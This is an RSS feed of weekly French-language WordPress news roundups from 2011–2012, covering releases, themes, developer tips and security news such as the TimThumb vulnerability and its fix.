<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>WordPress Francophone &#187; Sécurité</title>
	<atom:link href="http://www.wordpress-fr.net/category/securite/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wordpress-fr.net</link>
	<description>La communauté francophone autour du CMS WordPress et WordPress Mu</description>
	<lastBuildDate>Tue, 15 May 2012 07:55:48 +0000</lastBuildDate>
	<language>fr</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>L&#8217;Hebdo WordPress : WordPress 3.5 &#8211; WordPress 3.4 &#8211; Astuces</title>
		<link>http://www.wordpress-fr.net/2012/03/27/lhebdo-wordpress-wordpress-3-5-wordpress-3-4-astuces/</link>
		<comments>http://www.wordpress-fr.net/2012/03/27/lhebdo-wordpress-wordpress-3-5-wordpress-3-4-astuces/#comments</comments>
		<pubDate>Tue, 27 Mar 2012 05:36:35 +0000</pubDate>
		<dc:creator>Benoît</dc:creator>
				<category><![CDATA[Astuces]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[Hebdo]]></category>
		<category><![CDATA[Thèmes]]></category>
		<category><![CDATA[WordPress 3.4]]></category>
		<category><![CDATA[WordPress 3.5]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=4072</guid>
		<description><![CDATA[Astuces : WordPress et le changement d&#8217;heure Ce week end, la France a changé d&#8217;heure pour l&#8217;application de l&#8217;heure d&#8217;été. Si vous avez sélectionné le bon fuseau horaire (Paris) dans les réglages généraux, vous n&#8217;aurez rien à faire, le changement se fait automatiquement. Veillez donc a ce que le bon fuseau horaire soit sélectionné. Twenty [...]]]></description>
			<content:encoded><![CDATA[<h3>Astuces : WordPress et le changement d&#8217;heure</h3>
<p>Ce week end, la France a changé d&#8217;heure pour l&#8217;application de l&#8217;heure d&#8217;été. Si vous avez sélectionné le bon fuseau horaire (Paris) dans les réglages généraux, vous n&#8217;aurez rien à faire, le changement se fait automatiquement. Veillez donc a ce que le bon fuseau horaire soit sélectionné.</p>
<h3>Twenty Twelve présent dans WordPress 3.5</h3>
<p>Initialement prévu pour être livré avec WordPress 3.4, <a href="http://wpdevel.wordpress.com/2012/03/20/as-twenty-twelve-is-punted-to-3-5-it/">Twenty Twelve est finalement repoussé à WordPress 3.5</a>. Il est malgré tout mis à disposition <a href="https://github.com/thethemefoundry/twentytwelve">ici</a>.</p>
<h3>Qu&#8217;attendre de WordPress 3.4</h3>
<p>La prochaine mouture de WordPress va apporter son lot de modifications. <a href="http://theme.fm/2012/03/what-to-expect-in-wordpress-3-4-3231/">En voici un petit aperçu</a>.</p>
<h3>WP App Store</h3>
<p>La petite polémique du moment porte sur le projet <a href="http://wpappstore.com/">WP App Store</a> <a href="http://wpcandy.com/reports/wp-app-store-launches-in-april">qui propose une extension gratuite</a> qui permet l&#8217;installation d&#8217;un accès vers des thèmes et extensions payantes dans le tableau de bord de WordPress. Une dizaine d&#8217;acteurs majeurs dans le contenus premium WordPress fait partie de l&#8217;aventure. Lancement prévu en avril 2012.</p>
<h3>Une page d&#8217;archives pour les taxonomies personnalisées</h3>
<p>Aurélien explique comment créer une <a href="http://wpchannel.com/creer-page-archive-custom-taxonomies-wordpress/">page d&#8217;archives pour les taxonomies personnalisées</a> de WordPress.</p>
<h3>Activer le partage d&#8217;utilisateurs</h3>
<p>Voici une astuce de Geekeries <a href="http://www.geekeries.fr/snippet/activer-partage-utilisateurs-wordpress/">qui permet de partager des utilisateurs de WordPress </a>au sein de différents services partageant la même base de données.</p>
<h3>Créer une extension enfant</h3>
<p><a href="http://www.boiteaweb.fr/creer-un-plugin-enfant-sous-wordpress-3309.html">Julio nous explique comment réaliser une extension enfant</a>. Suivez le guide.</p>
<h3>Comment changer son identifiant</h3>
<p>L&#8217;identifiant est fait pour ne pas être modifiable. Si vous souhaitez vraiment le modifier <a href="http://www.wpbeginner.com/wp-tutorials/how-to-change-your-wordpress-username/">voici quand même une solution</a>.</p>
<h3>5 thèmes WordPress du mois de mars 2012</h3>
<p>Une <a href="http://managewp.com/top-5-free-wordpress-themes-of-the-month-march">liste de 5 thèmes gratuits</a> du mois de mars sélectionnés par ManageWP.</p>
<h3>Rappel sur les mots de passe</h3>
<p>Il est bon de rappeler l&#8217;utilité d&#8217;un bon mot de passe. <a href="http://blog.sucuri.net/2012/03/brute-force-attacks-against-wordpress-sites.html">WordPress est pris en exemple</a> pour appuyer la démonstration.</p>
<h3>Quelques astuces utiles</h3>
<p><a href="http://wplift.com/handy-wordpress-code-snippets-for-your-themes-2">Quelques petites astuces</a> qui peuvent être intéressantes à intégrer dans son site, selon ses besoins.</p>
<h3>Des outils, des thèmes et des extensions</h3>
<p>C&#8217;est ce que propose <a href="http://wp.smashingmagazine.com/2012/03/22/useful-wordpress-tools-themes-plugins/">en un seul article Smashing Magazine</a>. Ça vaut le coup d’œil.</p>
<h3>18 erreurs à éviter lors du lancement d&#8217;un blog corporate</h3>
<p>Une petite de 18 erreurs à éviter lorsque l&#8217;on veut lancer un blog corporate. Via <a href="https://twitter.com/#!/jflegat/statuses/184400603928215553">@jflegat</a>.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2012/03/27/lhebdo-wordpress-wordpress-3-5-wordpress-3-4-astuces/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>L&#8217;Hebdo WordPress : Android &#8211; Akismet &#8211; BuddyPress</title>
		<link>http://www.wordpress-fr.net/2012/01/17/lhebdo-wordpress-android-akismet-buddypress/</link>
		<comments>http://www.wordpress-fr.net/2012/01/17/lhebdo-wordpress-android-akismet-buddypress/#comments</comments>
		<pubDate>Tue, 17 Jan 2012 06:13:18 +0000</pubDate>
		<dc:creator>Benoît</dc:creator>
				<category><![CDATA[Astuces]]></category>
		<category><![CDATA[Extensions]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[Thèmes]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[akismet]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[BuddyPress]]></category>
		<category><![CDATA[communauté]]></category>
		<category><![CDATA[Hebdo]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=3824</guid>
		<description><![CDATA[WordPress pour Android 2.0.4 La version pour Android poursuit son évolution et passe en version 2.0.4. Mettez donc à jour. Akismet 2.5.5 L&#8217;extension antispam la plus célèbre évolue beaucoup ces dernières semaines. 2 mises à jour en quelques jours la font arriver en version 2.5.5. BuddyPress 1.5.3 Une mise à jour mineure de BuddyPress est [...]]]></description>
			<content:encoded><![CDATA[<h3>WordPress pour Android 2.0.4</h3>
<p>La version pour Android poursuit son <a href="https://twitter.com/#!/WPAndroid/statuses/158952514153234432">évolution et passe en version 2.0.4</a>. Mettez donc à jour.</p>
<h3>Akismet 2.5.5</h3>
<p>L&#8217;extension antispam la plus célèbre évolue beaucoup ces dernières semaines. 2 <a href="http://plugins.trac.wordpress.org/changeset?old_path=/akismet/tags/2.5.4&amp;old=&amp;new_path=/akismet/tags/2.5.5&amp;new">mises à jour</a> en quelques jours la font arriver en <a href="http://wordpress.org/extend/plugins/akismet/">version 2.5.5</a>.</p>
<h3>BuddyPress 1.5.3</h3>
<p>Une mise à jour mineure de BuddyPress est sortie cette semaine : <a href="http://buddypress.org/2012/01/buddypress-1-5-3/">BuddyPress 1.5.3</a>. Cette version a été aussitôt suivie par une autre mise à jour moindre <a href="http://buddypress.org/2012/01/buddypress-1-5-3-1/">puisqu&#8217;une version 1.5.3.1</a> est disponible.</p>
<h3>Les résolutions de la nouvelle année de Lorelle</h3>
<p><a href="http://lorelle.wordpress.com/2012/01/11/creating-a-wordpress-and-blogging-new-years-resolutions-list/">Lorelle présente une liste de résolutions pour 2012</a>, ou plutôt quelles devraient être les bonnes résolutions des blogueurs&#8230;</p>
<h3>Comment contribuer à WordPress quand on est pas développeur ?</h3>
<p>Voici une question que beaucoup doivent se poser. <a href="http://wpmu.org/want-to-contribute-to-wordpress-not-a-developer-no-problem/">WPMU.org propose une liste de suggestions</a> pour celles et ceux qui ne sauraient pas comment participer à la communauté WordPress alors qu&#8217;ils ne sont pas développeurs. Je suis, je pense, un bon exemple de cette catégorie de personnes d&#8217;ailleurs <img src='http://www.wordpress-fr.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Chacun peut faire selon ses connaissances et son envie.</p>
<h3>Une extension pour remplacer functions.php</h3>
<p>Aurélien explique comment conserver certaines fonctions ajoutées dans un thème lorsqu&#8217;on change justement ce dernier. <a href="http://wpchannel.com/creer-plugin-fonctions-globales-site-wordpress/">L&#8217;idée est de les réunir au sein d&#8217;une extension</a>.</p>
<h3>Quand WordPress remplace PowerPoint</h3>
<p><a href="http://imath.owni.fr/2012/01/14/easy-prez/">iMath vient de réussir un petit exploit</a>, utiliser WordPress et son shortcode  pour intégrer un diaporama PowerPoint trop lourd pour être uploadé. Le concept est original et la technique est très fine. Je décerne la palme de la semaine à cette astuce pour sa qualité.</p>
<h3>Présentation de la nouvelle barre d&#8217;outils</h3>
<p>Il y avait la barre d&#8217;admin, maintenant, il y a la barre d&#8217;outils. <a href="http://digwp.com/2012/01/goodbye-admin-bar-hello-toolbar/">Une présentation s’impose</a>.</p>
<h3>Un tuto pour les débutants</h3>
<p>Voici un tutoriel pour les débutants qui souhaitent mieux connaitre <a href="http://wpmu.org/wordpress-tutorial-for-beginners-the-new-post-page-screens/">l&#8217;écran d&#8217;édition des articles et des pages</a>.</p>
<h3>7 conseils de sécurité</h3>
<p>GeekPress revient sur la sécurité de votre site en donnant <a href="http://www.geekpress.fr/wordpress/guide/7-conseils-securite-wordpress-802/">7 conseils utiles pour se protéger</a>.</p>
<h3>Les types de contenus personnalisés abordables ?</h3>
<p>C&#8217;est ce que propose <a href="http://www.wpmayor.com/plugin-reviews/wordpress-post-formats-admin-ui/">cette interface d&#8217;administration</a> afin de faciliter l&#8217;usage des CPT par tout un chacun. Intéressant !</p>
<h3>20 thèmes gratuits</h3>
<p><a href="http://wp-themes-pro.com/theme-wordpress-gratuit-2012/">WP-Themes-pro propose une sélection de 20 thèmes</a> récents et gratuits. La qualité est au rendez-vous et les thèmes pourvu de cryptage ont été nettoyés au préalable.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2012/01/17/lhebdo-wordpress-android-akismet-buddypress/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>L&#8217;Hebdo WordPress : TimThumb &#8211; BuddyPress &#8211; Types de Contenus Personnalisés</title>
		<link>http://www.wordpress-fr.net/2011/08/09/lhebdo-wordpress-timthumb-buddypress-types-de-contenus-personnalises/</link>
		<comments>http://www.wordpress-fr.net/2011/08/09/lhebdo-wordpress-timthumb-buddypress-types-de-contenus-personnalises/#comments</comments>
		<pubDate>Tue, 09 Aug 2011 05:23:13 +0000</pubDate>
		<dc:creator>Benoît</dc:creator>
				<category><![CDATA[Astuces]]></category>
		<category><![CDATA[Brèves]]></category>
		<category><![CDATA[Développement]]></category>
		<category><![CDATA[Extensions]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[Thèmes]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[BuddyPress]]></category>
		<category><![CDATA[cms]]></category>
		<category><![CDATA[comparatif]]></category>
		<category><![CDATA[Forums]]></category>
		<category><![CDATA[Hebdo]]></category>
		<category><![CDATA[miniatures]]></category>
		<category><![CDATA[mobile]]></category>
		<category><![CDATA[TimThumb]]></category>
		<category><![CDATA[windows phone 7]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=3275</guid>
		<description><![CDATA[Cet hebdo est en grande partie consacré à la saga TimThumb qui a marqué cette semaine WordPress. Il reprend les éléments dont nous avons parlé sur les réseaux sociaux complété des actualités plus récentes. Après cet &#171;&#160;article post hebdo&#160;&#187;, l&#8217;hebdo lui-même reprend ses droits avec des liens tirés de l&#8217;actualité WordPress de la semaine écoulée&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p>Cet hebdo est en grande partie consacré à la saga TimThumb qui a marqué cette semaine WordPress. Il reprend les éléments dont nous avons parlé sur les réseaux sociaux complété des actualités plus récentes.</p>
<p>Après cet &laquo;&nbsp;article post hebdo&nbsp;&raquo;, l&#8217;hebdo lui-même reprend ses droits avec des liens tirés de l&#8217;actualité WordPress de la semaine écoulée&#8230; car, oui, TimThumb n&#8217;aura pas porté toute l&#8217;attention vers lui.</p>
<h3>La saga TimThumb</h3>
<p>Je reprends volontairement le titre de l&#8217;<a href="http://ma.tt/2011/08/the-timthumb-saga/">article de Matt</a> sur le sujet. Il résume bien la situation. Depuis une semaine environ, <a href="http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/">une faille de sécurité fait la une</a> de l&#8217;<a href="http://korben.info/timthumb-exploit-wordpress.html">actualité WordPress</a>. Nos <a href="http://www.facebook.com/permalink.php?story_fbid=256576627703582&amp;id=188994977822289">page Facebook</a> et <a href="http://twitter.com/wordpress_fr/statuses/99074646929969152">compte Twitter</a> se sont fait les échos de cette affaire de sécurité et du correctif apporté dans les mêmes temps&#8230; Les réseaux sociaux sont très pratiques pour ce genre de communication de crise.</p>
<p>Mais il est bon de rappeler que cette faille de sécurité, si elle est bien réelle, n&#8217;est absolument pas une faille de WordPress. La nuance est importante.</p>
<p>En effet, WordPress n&#8217;est en aucun cas responsable de la faille et n&#8217;en est pas même affecté à proprement parlé. Cette faille a été découverte au sein d&#8217;un script qui se trouve être utilisé par de très nombreux thèmes WordPress et notamment des Premium : Timthumb, qui permet le redimensionnement des images. Là où le bât blesse, c&#8217;est que ce script largement utilisé donc, ne peux pas toujours être mis à jour facilement car il ne s&#8217;agit pas forcément d&#8217;une extension, mais il est souvent directement intégré dans le thème. Il est bien connu que même lorsqu&#8217;un éditeur de thème propose une mise à jour, l&#8217;utilisateur hésite à la mettre en place du fait des modifications apportées à sa propre installation. C&#8217;est ce que dit Matt :</p>
<blockquote><p>Because the code is commonly embedded in themes it’s not easy to discretely update like it would be if the code were a plugin, and even when a theme is updated people are hesitant to update because they often customize theme code rather than making child themes, so if they were to overwrite their theme with a new version they’d lose their modifications. That, combined with the severity of the flaw, means that this is one of the more serious issues in the WordPress ecosystem in a while, even more than normal because it <em>wasn’t</em> in core.</p>
<p><span style="text-decoration: underline;">Traduction :</span></p>
<p>Parce que le code est souvent intégré au thème, il n&#8217;est pas toujours facile de le mettre à jour comme on le ferait s&#8217;il s&#8217;agissait d&#8217;une extension, et même lorsque le thème serait mis à jour (ndlr : par son auteur), les utilisateurs seraient hésitant à mettre à jour parce qu&#8217;ils ont souvent personnalisé le code du thème directement plutôt que d&#8217;avoir créé un thème enfant, donc s&#8217;ils écrasent leur thème pour mettre à jour, ils écraseront leurs modifications. Ceci, combiné à la gravité de la faille, signifie que nous avons affaire à l&#8217;un des plus importants problèmes que l&#8217;écosystème de WordPress ait connu, même plus que d&#8217;ordinaire, puisque <em>ce n&#8217;est pas</em> le cœur de WordPress.</p></blockquote>
<p><strong>Notons que la solution existe !</strong></p>
<p>Si vous avez ce script présent dans votre thème, vous devriez avoir un fichier nommé <em>timthumb.php</em> ou bien encore <em>thumb.php</em>. Il vous suffit alors de l&#8217;ouvrir dans votre éditeur de texte préféré et de remplacer le code par celui présent sur la page officiel du projet : <a href="http://timthumb.googlecode.com/svn/trunk/timthumb.php">http://timthumb.googlecode.com/svn/trunk/timthumb.php</a>, puis vous enregistrez vos modifications et remettez le fichier à sa place dans votre thème.</p>
<p><strong>La communauté a réagit tout de suite</strong></p>
<p>D&#8217;une part, les thèmes du répertoire officiel sont analysés un à un pour être corrigé le cas échéant, les blogs des diverses communautés parlent du problème ouvertement.</p>
<p>D&#8217;autre part, Mark Maunder qui a découvert la faille a réalisé une mise à jour sous forme d&#8217;un <a href="http://markmaunder.com/2011/a-secure-rewrite-of-timthumb-php-as-wordthumb/">fork </a>qui est depuis, <a href="http://markmaunder.com/2011/wordthumb-is-now-timthumb-2-0/">devenu la version 2.0 du script TimThumb</a> suite à une collaboration avec l&#8217;auteur du script. Une prouesse de l&#8217;open source !</p>
<p><span id="more-3275"></span></p>
<h3>Avec WordPress, faites ce que vous voulez !</h3>
<p>On ne le répétera jamais assez, WordPress n&#8217;est plus qu&#8217;un simple outil de blog, il est un vrai CMS, <a href="http://www.wolforg.eu/avec-wordpress-faites-ce-que-vous-voulez/">comme nous le (ré)explique Didier</a>, notre cher Wolforg !</p>
<h3>Un contenu personnalisé pour chaque visiteur</h3>
<p><a href="http://www.readwriteweb.com/hack/2011/07/personyze-aims-to-personalize.php">C&#8217;est ce que propose la nouvelle extension Personyze</a> dont m&#8217;a fait part Danny Hen par e-mail cette semaine. <a href="http://www.cmswire.com/cms/web-engagement/personyze-teams-with-joomla-wordpress-to-personalize-content-management-012098.php">Une extension qui permet d&#8217;enrichir l&#8217;expérience utilisateur</a> très facilement et de manière puissante.</p>
<h3>Comparer Joomla!, WordPress et Drupal selon les besoins</h3>
<p><a href="http://news.deviousmedia.com/which-open-source-backend-platform-suits-your">Voici un énième tableau comparant les 3 principaux CMS</a> du moment, à savoir WordPress, Joomla! et Drupal. La comparaison se fait par besoin. Instructif.</p>
<h3>Utiliser les Types de Contenu Personnalisés avec la Boucle</h3>
<p>WPEngineer montre comment utiliser les fameux CPT avec la non moins fameuse Boucle de WordPress. <a href="http://wpengineer.com/2249/wordpress-custom-post-types-get-into-the-loop/">Suivez le guide</a>.</p>
<h3>WordPress pour Windows Phone 7</h3>
<p>Cela faisait quelques semaines que je ne vous avais pas parlé de version mobile de WordPress. Cette semaine, voici une nouvelle version de WordPress pour Windows Phone 7 qui voit le jour. <a href="http://windowsphone.wordpress.org/2011/08/03/version-1-2-now-available/">Il s&#8217;agit de l&#8217;opus numéroté 1.2</a>.</p>
<h3>BuddyPress 1.5 Beta 2</h3>
<p>Le développement de BuddyPress est reparti de plus belle avec <a href="http://buddypress.org/2011/08/buddypress-1-5-beta-2/">une 2e beta en 2 semaines pour la future version 1.5</a>.</p>
<h3>Migrer un forum PHPbb vers bbPress</h3>
<p>Vous disposez d&#8217;un forum PHPbb et vous souhaitez le migrer vers une installation de forum tournant sous la dernière version de bbPress, <a href="http://wpmu.org/how-to-migrate-a-phpbb-forum-to-wordpress-and-bbpress/">WPMU.org vous dit comment le faire.</a></p>
<h3>Organiser les Types de contenus personnalisés</h3>
<p>Si vous avez décidé d&#8217;utiliser les Custom Post Types de façon intensive, il vous faudra surement mettre de l&#8217;ordre dans votre installation. <a href="http://www.gregoirenoyelle.com/tuto/wordpress-organiser-custom-post-type-comme-dossiers/">Voici comment classer votre CPT sous formes de dossiers.</a> C&#8217;est Grégoire Noyelle qui en parle avec l&#8217;exemple de la mise en place d&#8217;une FAQ.</p>
<h3>La gestion des miniatures en natif dans WordPress, comment ça marche ?</h3>
<p>Aurélien Denis propose de <a href="http://wpchannel.com/gestion-miniatures-thumbnails-wordpress/">récapituler comment gérer les miniatures</a> dans WordPress&#8230; et sans TimThumb !</p>
<h3>Générer une miniature d&#8217;un site</h3>
<p><a href="http://www.geekeries.fr/snippet/creer-automatiquement-miniatures-sites-wordpress">Vous voulez générer la miniature d&#8217;un site</a> duquel vous indiquez une URL par exemple&#8230; voici comment faire ceci, expliqué par Valentin de Geekeries.</p>
<h3>Les secrets de functions.php</h3>
<p><a href="http://www.lumieredelune.com/encrelune/fichier-functions-php,2011,08">Lumière de Lune nous délivre ici quelques secrets sur le célèbre fichier functions.php </a>des thèmes WordPress. Cela devrait en intéresser plus d&#8217;un.</p>
<p><a href="http://www.gregoirenoyelle.com/tuto/wordpress-organiser-custom-post-type-comme-dossiers/"><br />
</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2011/08/09/lhebdo-wordpress-timthumb-buddypress-types-de-contenus-personnalises/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
		</item>
		<item>
		<title>L&#8217;Hebdo WordPress : WordPress 3.3 &#8211; BuddyPress 1.5 &#8211; Astuces</title>
		<link>http://www.wordpress-fr.net/2011/08/02/lhebdo-wordpress-13/</link>
		<comments>http://www.wordpress-fr.net/2011/08/02/lhebdo-wordpress-13/#comments</comments>
		<pubDate>Tue, 02 Aug 2011 05:20:18 +0000</pubDate>
		<dc:creator>Benoît</dc:creator>
				<category><![CDATA[Astuces]]></category>
		<category><![CDATA[Développement]]></category>
		<category><![CDATA[Extensions]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[Thèmes]]></category>
		<category><![CDATA[WordPress Francophone]]></category>
		<category><![CDATA[astuce]]></category>
		<category><![CDATA[BuddyPress]]></category>
		<category><![CDATA[cms]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[Hebdo]]></category>
		<category><![CDATA[Jetpack]]></category>
		<category><![CDATA[statistiques]]></category>
		<category><![CDATA[Widget]]></category>
		<category><![CDATA[WordPress 3.3]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=3109</guid>
		<description><![CDATA[De retour après une petite semaine de vacances bien occupée&#8230; Nouveau groupe Facebook pour la communauté francophone de WordPress Depuis quelques semaines, WordPress Francophone dispose d&#8217;une nouvelle page sur Facebook. Si vous ne nous avez pas encore rejoint, c&#8217;est simple, il suffit de cliquer sur le bouton &#171;&#160;J&#8217;aime&#160;&#187; présent sur la page. On vous attend. [...]]]></description>
			<content:encoded><![CDATA[<p>De retour après une petite semaine de vacances bien occupée&#8230;</p>
<h3>Nouveau groupe Facebook pour la communauté francophone de WordPress</h3>
<p>Depuis quelques semaines, WordPress Francophone <a href="http://www.facebook.com/pages/WordPress-Francophone/188994977822289">dispose d&#8217;une nouvelle page sur Facebook</a>. Si vous ne nous avez pas encore rejoint, c&#8217;est simple, il suffit de cliquer sur le bouton &laquo;&nbsp;J&#8217;aime&nbsp;&raquo; présent sur la page. On vous attend.</p>
<h3>WordPress 3.3</h3>
<p><a href="http://wpdevel.wordpress.com/version-3-3-project-schedule/">Le calendrier de développement de WordPress 3.3</a> a été dévoilé par Jane Wells le 20 juillet dernier. La sortie prévisionnelle est donc planifiée le 15 novembre. Le 27 juillet, <a href="http://wpdevel.wordpress.com/2011/07/27/wordpress-3-3-proposed-scope/">elle proposait une liste de travail</a> comprenant des nouvelles fonctionnalités potentielles à intégrer et des éléments à aborder dans ce nouveau &laquo;&nbsp;chantier&nbsp;&raquo;.</p>
<h3>BuddyPress 1.5 Beta 1</h3>
<p>Le développement de BuddyPress n&#8217;est pas aussi rapide et régulier que celui de WordPress mais il n&#8217;est pas à l&#8217;arrêt pour autant. <a href="http://buddypress.org/2011/07/buddypress-1-5-beta-1/">La version 1.5 beta 1 vient d&#8217;être rendu disponible</a> (<a href="http://bp-fr.net/2011/07/buddypress-1-5-beta-1/">Lien en français</a>). Testeurs et développeurs, <a href="http://bpdevel.wordpress.com/2011/07/31/maintaining-1-2-compatibility-slugs/">c&#8217;est à vous qu&#8217;elle s&#8217;adresse</a> !</p>
<h3>Diverses statistiques sur WordPress</h3>
<p>Le site W3Techs publie quelques statistiques intéressantes sur WordPress. <a href="http://w3techs.com/technologies/details/cm-wordpress/all/all">La consultation se passe par ici.</a></p>
<h3>Découvrir les Shortcodes</h3>
<p><a href="http://speckyboy.com/2011/07/18/getting-started-with-wordpress-shortcodes-examples/">Speckyboy donne un petit cours sur les shortcodes</a>, ces petits codes que l&#8217;on peut créer pour ajouter facilement des contenus spécifiques dans ses articles et pages WordPress.</p>
<h3>Créer une metabox</h3>
<p>Lorsque l&#8217;on est développeur de thèmes et/ou d&#8217;extensions WordPress, il est bon de savoir ce qu&#8217;est une metabox et encore mieux de maitriser la manière d&#8217;en créer. <a href="http://wp.tutsplus.com/tutorials/plugins/how-to-create-custom-wordpress-writemeta-boxes/">C&#8217;est ce que wptuts+ s&#8217;emploie à faire</a>&#8230; suivez le guide.</p>
<h3>WPTouch touché par une faille critique</h3>
<p>Si vous êtes un possesseur de l&#8217;extension WPTouch, mettez-la à jour si cela n&#8217;est pas encore fait. <a href="http://www.boiteaweb.fr/wptouch-free-v1-9-31-csrf-2979.html">Boiteaweb signale une faille importante de sécurité</a> touchant la version 1.9.31. Passez rapidement à la version 1.9.32.</p>
<h3>Quel est votre CMS favori ? Votez !</h3>
<p><a href="http://www.linuxjournal.com/content/what-your-favorite-open-source-cms">Linux Journal propose un sondage</a> afin de désigner le CMS favori des utilisateurs. Votez !</p>
<h3>Un thèmes Google+</h3>
<p>La Google+ mania n&#8217;en finie plus, <a href="http://www.emarketip.com/theme-wordpress-gratuit-google-plus-wp-plus/">un thème WordPress basé sur le design du nouveau réseau social</a> vient de faire son apparition.</p>
<h3>5 astuces pour sécuriser votre site WordPress</h3>
<p>La sécurité est au cœur de toutes les préoccupations. <a href="http://www.kris3d.com/2011/07/22/5-astuces-pour-securiser-votre-site-wordpress/">Voici donc 5 points à connaitre</a> pour la sécurité de votre site sous WordPress.</p>
<h3>Ajouter un compte à rebours</h3>
<p>Si vous avez besoin d&#8217;un compte à rebours sur votre site, <a href="http://www.wpjedi.com/jquery-countdown-timer-plugin/">voici une méthode utilisant jQuery</a> via une extension.</p>
<h3>Le mode &laquo;&nbsp;accessibilité&nbsp;&raquo; des Widgets</h3>
<p>Il existe un mode &laquo;&nbsp;accessibilité&nbsp;&raquo; dans le tableau de gsetion des widgets. Effectivement, la page étant toute en javascript, il était nécessaire de la rendre accessible. <a href="http://wpmu.org/daily-tip-how-to-enable-accessibility-mode-for-wordpress-widgets/">Voici l&#8217;astuce à découvrir sur WPMU.org</a>.</p>
<h3>Vérification conditionnelle de Type de Contenu Personnalisé</h3>
<p>Justin Tadlock donne un cours rapide sur la façon <a href="http://devpress.com/blog/conditional-checks-for-custom-post-types/">de gérer les Custom Post Type</a> (Type de Contenu Personnalisé).</p>
<h3>Supprimer la taxonomie de WordPress</h3>
<p>Si vous avez besoin de supprimer définitivement les mots-clés et catégories de WordPress <a href="http://www.geekpress.fr/wordpress/astuce/desactiver-taxonomy-defaut-wordpress-572/">alors voici l&#8217;astuce qu&#8217;il vous faut</a>.</p>
<h3>Ajouter une fonction PDF dans Sharedaddy</h3>
<p>Depuis l&#8217;arrivée de l’extension Jetpack, l&#8217;utilisation des liens disponibles dans Sharedaddy se démocratise. Il est même possible d&#8217;insérer ses propres services. Voici une astuce pour mettre un <a href="http://www.wordpress-fr.net/support/viewtopic.php?id=49924">bouton permettant la transformation de la page en PDF.</a></p>
<h3>55 astuces pour WordPress</h3>
<p><a href="http://www.wpbeginner.com/wp-tutorials/55-most-wanted-wordpress-tips-tricks-and-hacks/">Voici une liste de 55 astuces </a>pour WordPress pour tout niveau, toute utilisation et tous utilisateurs&#8230;</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.wordpress-fr.net/2011/08/02/lhebdo-wordpress-13/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>L&#8217;Hebdo WordPress : WordPress 3.1.1 &#8211; WorldWide WP 5k &#8211; Personnalisation</title>
		<link>http://www.wordpress-fr.net/2011/04/05/lhebdo-wordpress-11/</link>
		<comments>http://www.wordpress-fr.net/2011/04/05/lhebdo-wordpress-11/#comments</comments>
		<pubDate>Tue, 05 Apr 2011 05:02:49 +0000</pubDate>
		<dc:creator>Benoît</dc:creator>
				<category><![CDATA[Astuces]]></category>
		<category><![CDATA[Blog]]></category>
		<category><![CDATA[Développement]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[Thèmes]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[WordPress underground]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[astuce]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[importation]]></category>
		<category><![CDATA[mobile]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[personnalisation]]></category>
		<category><![CDATA[underground]]></category>
		<category><![CDATA[WordPress 3.1]]></category>

		<guid isPermaLink="false">http://www.wordpress-fr.net/?p=2637</guid>
		<description><![CDATA[WordPress 3.1.1 pour bientôt ? L&#8217;équipe de développement a laissé entendre une sortie imminente de WordPress 3.1.1 sur le Twitter officiel de développement. Le trac en témoigne avec 100 % des tickets fermés. Et notons que le codex a été mis à jour et laisse apparaitre une page consacrée avec une sortie annoncée au 4 [...]]]></description>
			<content:encoded><![CDATA[<h3>WordPress 3.1.1 pour bientôt ?</h3>
<p>L&#8217;équipe de développement a laissé entendre une sortie imminente de WordPress 3.1.1 <a href="http://twitter.com/wpdevel/statuses/54939198490292224">sur le Twitter officiel de développement</a>. Le <a href="http://core.trac.wordpress.org/milestone/3.1.1">trac en témoigne</a> avec 100 % des tickets fermés. Et notons que le codex a été mis à jour et laisse apparaitre une <a href="http://codex.wordpress.org/Version_3.1.1">page consacrée</a> avec une sortie annoncée au 4 avril 2011. (<em>NDR : Au moment où j&#8217;écris ces lignes, nous sommes lundi 4 avril 2011, il est 21 H 00 et cette version n&#8217;est pas encore sortie</em>&#8230; <em>mais le décalage horaire existe !</em>).</p>
